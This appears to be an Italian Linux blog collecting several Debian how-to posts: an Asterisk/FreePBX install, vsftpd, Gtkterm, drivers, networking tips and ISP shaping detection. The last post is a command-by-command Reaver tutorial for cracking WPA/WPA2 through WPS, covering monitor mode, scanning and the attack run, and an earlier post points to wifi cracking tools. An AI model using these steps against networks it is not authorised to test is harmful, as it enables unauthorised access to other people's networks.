Asterisk 11 con Freepbx 2.11 su Debian 7 Wheezy

 

 

Guida su Asterisk 11 con Freepbx 2.11 su Debian 7 Wheezy. Mi sono cimentato nell'installazione del centralino Asterisk con l'interfaccia Freepbx su Debian Wheezy. Dopo diversi tentativi il tutto è andato a buon fine. Di seguito riporterò i passi effettuati su una Debian 7 Wheezy appena installata. I comandi sotto sono stati eseguiti tutti da root.

 

Aggiornare il sistema:

 

# apt-get update && apt-get upgrade -y

 

Scaricare le dipendenze ed i servizi necessari:

 

# apt-get install -y build-essential linux-headers-`uname -r` openssh-server apache2 mysql-server mysql-client bison flex php5 php5-curl php5-cli php5-mysql php-pear php-db php5-gd curl sox libgnutls26 libncurses5-dev libssl-dev libmysqlclient-dev mpg123 libxml2-dev libnewt-dev sqlite3 libsqlite3-dev pkg-config automake libtool autoconf git subversion uuid-dev libjansson-dev smartmontools zip unzip rar unrar arj zoo sox

 

a metà installazione verrà chiesto di settare una password per mysql. MEMORIZZARLA/SEGNARSELA.

poi:

 

# pear uninstall db
# pear install db-1.7.14

 

Scaricare l'occorrente: Asterisk, Dahdi, Libpri, Freepbx.

 

# cd /usr/src
# wget https://downloads.asterisk.org/pub/telephony/dahdi-linux-complete/\
dahdi-linux-complete-current.tar.gz
# wget
# wget https://downloads.asterisk.org/pub/telephony/asterisk/asterisk-11-current.tar.gz
# wget https://mirror.freepbx.org/freepbx-2.11.0.40.tgz

 

Installare Dahdi:

 

# cd /usr/src
# tar xvfz dahdi-linux-complete-current.tar.gz
# cd dahdi-linux-complete-2.10.0.1+2.10.0.1
# make -j4 all
# make install
# make config

 

Installare Libpri:

 

# cd /usr/src
# tar xvfz libpri-1.4-current.tar.gz
# cd libpri-1.4.15
# make -j4
# make install

 

Installare Asterisk:

 

# cd /usr/src
# tar xvfz asterisk-11-current.tar.gz
# cd asterisk-11.15.0
# ./configure
# ./contrib/scripts/install_prereq install
# contrib/scripts/get_mp3_source.sh
# make menuselect
# make -j4
# make install
# make config

 

Riavviare il sistema:

 

# reboot

 

dopo il riavvio controllare che tutti i servizi sono up:

 

# service asterisk start
# service apache2 start
# service mysql start

 

per entrare nella CLI di Asterisk:

 

# asterisk -r
Ctrl>c

 

 

Creazione utente e settaggio dei permessi:

 

# adduser asterisk --disabled-password --gecos "Asterisk User"
# chown -R asterisk. /var/run/asterisk
# chown -R asterisk. /etc/asterisk
# chown -R asterisk. /var/{lib,log,spool}/asterisk
# chown -R asterisk. /usr/lib/asterisk
# mkdir /var/www/html
# chown -R asterisk. /var/www/

 

Modifiche più o meno necessarie nel file di configurazione di apache:

 

# sed -i 's/\(^upload_max_filesize = \).*/\120M/' /etc/php5/apache2/php.ini
# cp /etc/apache2/apache2.conf /etc/apache2/apache2.conf_orig
# sed -i 's/^\(User\|Group\).*/\1 asterisk/' /etc/apache2/apache2.conf
# service apache2 restart

 

Configurazione del database Asterisk in mysql:

 

# export ASTERISK_DB_PW=amp109
# mysqladmin -p -u root create asterisk
# mysqladmin -p -u root create asteriskcdrdb

verrà richiesta la password di mysql scelta in precedenza.

 

# mysql -u root -p

 

adesso siamo nella CLI di mysql e dare i comandi successivi, sostituire PASSWD_MYSQL con la password creata:

 

GRANT ALL PRIVILEGES ON asterisk.* TO asteriskuser@localhost IDENTIFIED BY
'PASSWD_MYSQL';
GRANT ALL PRIVILEGES ON asteriskcdrdb.* TO asteriskuser@localhost IDENTIFIED
BY 'PASSWD_MYSQL';
flush privileges;
quit

 

restart Asterisk:

 

# /etc/init.d/asterisk restart

 

Installazione di Freepbx:

 

# cd /usr/src/
# export VER_FREEPBX=2.11
# tar xvfz freepbx-2.11.0.40.tgz
# cd /usr/src/freepbx
# mysql -p -u root asterisk < SQL/newinstall.sql
# mysql -p -u root asteriskcdrdb < SQL/cdr_mysql_table.sql
# ./install_amp --webroot /var/www

oppure:

# ./install_amp --username=asteriskuser --password=$ASTERISK_DB_PW --webroot /var/www

 

Se tutto è andato bene puntare il browser su https://localhost/admin

 

Asterisk 11 con Freepbx 2.11 su Debian 7 Wheezy

 

enjoy 😉

 

Vsftpd su Debian Wheezy

 

 

Vsftpd (acronimo di Very Secure FTP Daemon) è quello che uso come servizio ftp, semplice, leggero, sicuro e veloce da configurare.

 

$ sudo apt-get install vsftpd

 

subito dopo mettere mano al file di configurazione:

 

$ sudo nano /etc/vsftpd.conf

 

per una configurazione base i punti più importanti da decommentare sono:

.

  1. local_enable=YES

    Abilita/disabilita l'accesso agli utenti locali.

  2. write_enable=YES

    Abilita/disabilita agli utenti l'accesso in scrittura.

  3. xferlog_enable=YES

    Attiva i log su tutte le operazioni di scaricamento e caricamento file.

  4. xferlog_file=/var/log/vsftpd.log

    Specifica il percorso per i file di log.

  5. ftpd_banner=

    Imposta un messaggio di benvenuto visualizzato all'accesso al server FTP.

 

Per fermare/avviare/riavviare il servizio digitare i seguenti comandi:

 

$ sudo /etc/init.d/vsftpd stop
$ sudo /etc/init.d/vsftpd start
$ sudo /etc/init.d/vsftpd restart

 

per testare:

 

$ ftp 192.168.x.x

 

enjoy 😉

 

Gtkterm-0.99.7 su Debian Wheezy

 

gtkterm-300x204

 

Gtkterm è un semplice terminale GTK+ da usarsi per comunicare con la porta seriale. Sarebbe l'equivalente di Hyperterminal e di SecureCRT, in Windows. Io personalmente lo preferisco sia a cutecom che a minicom, che tra l'altro attualmente non mi funziona sulla mia Debian. Nei repo di Debian Wheezy non è presente Gtkterm, lo si può trovare in Testing o in Sid. già pacchettizzato, oppure seguendo i passi successivi:

 

$ sudo apt-get install atool intltool libvte-dev
$ wget ftp://ftp.hu.debian.org/pub/linux/distributions/gentoo/distfiles/gtkterm-0.99.7-rc1.tar.gz
$ atool -x  gtkterm-0.99.7-rc1.tar.gz
$ cd gtkterm-0.99.7-rc1
$ ./configure
$ make -j4
$ sudo make install

 

poi si avvia con:

 

$ sudo gtkterm

 

Le sue caratteristiche sono:

 

 * finestra terminale per la porta seriale;
 * impostazione della porta (velocità, parità, numero di bit, numero di
   bit di stop, controllo di flusso);
 * usa la API termios;
 * possibilità di inviare un file (solo dati GREZZI, senza protocollo);
 * la caduta della linea è ritardata durante l'invio di un file;
 * i caratteri speciali attendono un "a capo" durante le trasmissione
   di un file;
 * possibilità di cambiare le linee di controllo manualmente (DTR, CTS);
 * possibilità di leggere lo stato delle linee di controllo (RTS, CD,
   DSR, RI).

 

enjoy 😉

 

(Cracking) Wifite e Reaver nei repository di Debian Sid

 

 

 

Non so quanto è vecchia la notizia, ma siccome mi sono assentato per quasi due mesi dal blog, nei quali non ho seguito nulla, mi sono accorto adesso di alcune novità. Alcuni strumenti utili per il cracking sulle reti wifi, sono stati introdotti nei repository di Debian Sid. Parlo nello specifico di Wifite e di Reaver, ed ho notato che la versione di aircrack-ng è alla versione 1.1-5. Di questi strumenti e sul loro utilizzo avevo parlato in passato, facendo anche delle guide. WifiteReaveraircrack-ng.

 

enjoy 😉

Installare RetroShare amd64 su Debian Sid

 

 

 

 

RetroShare è una applicazione multipiattaforma per la condivisione di files su rete F2F, ritenuta molto sicura in quanto si autentifica con GPG e ci si connette tramite un tunnel ssh. Sul sito ufficiale ci sono pacchetti pronti per diverse distribuzioni. Nel caso specifico Debian, esiste solo il pacchetto a 32bit per Squeeze, siccome io uso Sid amd64, mi sono dovuto arrangiare:

 

wget

sudo dpkg -i retroshare_0.5.3-0.5256~oneiric_amd64.deb

 

una volta avviato la configurazione è intuitiva.

 

enjoy 😉
 

(Errori) Network-Manager dispositivo non gestito su Debian Squeeze

 

 

 

 

A volte capita/capitava su Debian Squeeze, di trovarsi con l'icona di Network-Manager con una X, per segnalare un problema con la connessione, ma in realtà la connessione c'è, ed è funzionante. Per risolvere il problema:

 

# nano /etc/NetworkManager/NetworkManager.conf

 

e settare a true:

 

[ifupdown]
managed=true

 

riavviare:

 

# /etc/init.d/network-manager restart

 

 

enjoy 😉

Connessione ad hoc wifi tra Debian Sid ed Iphone 4

 

 

 

 

Creare una connessione aod hoc su Debian Sid è diventato molto semplice, basta andare nelle impostazioni di rete, e premere "usa come hotspot", a quel punto si da il Nome, e si sceglie il tipo di protezione, wep, wpa, wpa2, e dal lato host il tutto è fatto.

 

 

Dal lato client, nello specifico, Iphone 4 con OS 5.0.1, si avvia il wireless, e si noterà subito una nuova connessione.

 

 

per collegarsi bisogna mettere un indirizzo statico, nel mio caso avendo il router del tipo 192.168.1.X, l' IP da mettere deve essere dello stesso tipo, per intenderci come in figura, non 192.168.0.2 o 192.168.2.X. Come Router e DNS, bisogna mettere l'indirizzo IP dell' host, nel mio caso, 192.168.1.2

 

 

questa schermata invece è relativa agli indirizzi dati in automatico successivamente. Questa connessione ad hoc io non la uso internamente, dato che il mio è un router wireless, ma mi serve perchè sto facendo un esperimento con un'antennino dalla portata di 3km…..vedremo se è così 🙂 L'idea sarebbe quella di sfruttare la connessione ad internet del pc di casa lasciato acceso, magari in piazza o al parco 😉

 

 

enjoy 😉

Scoprire limitazioni di banda (ISP) con Debian e Gnu/Linux

 

 

 

 

Per scoprire se il proprio ISP limita la banda, in ambienti Gnu/Linux si può utilizzare DiffProbe Shaper Module.

 

$ wget

$ tar xvf shaperprobe.tgz

$ cd shaperprobe

$ make

$ ./prober

 

il test dura un paio di minuti, e se tutto è andato bene, si avrà qualcosa di simile.

 

edmond@Debianbox:~/shaperprobe$ ./prober
DiffProbe release. January 2012.
Shaper Detection Module.

Connected to server 74.63.50.40.

Estimating capacity:
Upstream: 54 Kbps.
Downstream: 547 Kbps.

The measurement will last for about 2.5 minutes. Please wait.

Checking for traffic shapers:

Upstream: No shaper detected.
Median received rate: 112 Kbps.

Downstream: Burst size: 130-135 KB; Shaping rate: 373 Kbps.

For more information, visit:
 

 

enjoy 😉

Kernel 2.6.39-bpo + Broadcom BCM4313 su Debian Squeeze

 

 

 

 

Sul mio nuovo Acer Aspire One D257, ho installato naturalmente Debian Squeeze. Come scheda wifi ha una Broadcom Corporation BCM4313, che si compila facilmente col kernel di default 2.6.32, ma ci sono dei problemi, se come me, si installa l'ultimo kernel dai backport, nel mio caso il 2.6.39-bpo.2-686-pae. Per compilare senza problemi questo driver, bisogna aggiungere momentaneamente i repository testing, poichè abbiamo bisogno di broadcom-sta-source broadcom-sta-common alla versione 5.100, mentre su Squeeze sono alla 5.60. Quindi una volta installati, si possono togliere i repository testing, e procedere con l'installazione dei driver per la BCM4313.

 

# apt-get install module-assistant wireless-tools

# m-a a-i broadcom-sta

# echo blacklist brcm80211 >> /etc/modprobe.d/broadcom-sta-common.con

# update-initramfs -u -k $(uname -r)

# modprobe -r b44 b43 b43legacy ssb

# modprobe wl

 

enjoy 😉

Reaver WPS su Debian e cracking password WPA/WPA2 in meno di 12 ore

 

 

 

Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di  pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:

 

$ sudo apt-get install libpcap0.8-dev libsqlite3-dev

$ wget 

$ tar -xvf reaver-1.3.tar.gz

$ cd reaver-1.3/src/

$ ./configure

$ make

$ sudo make install

 

mettere in monitor mode la scheda:

 

# airmon-ng start wlan0

 

il comando sopra creerà mon0 in monitor mode

 

Interface    Chipset        Driver

wlan0        Ralink 2561 PCI    rt61pci – [phy0]
                (monitor mode enabled on mon0
)

 

scanning per rilevare reti wpa:

 

# walsh -i mon0 --ignore-fcs

 

attacco:

 

# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small

 

per altri comandi leggere la documentazione all'interno del pacchetto.

 

enjoy 😉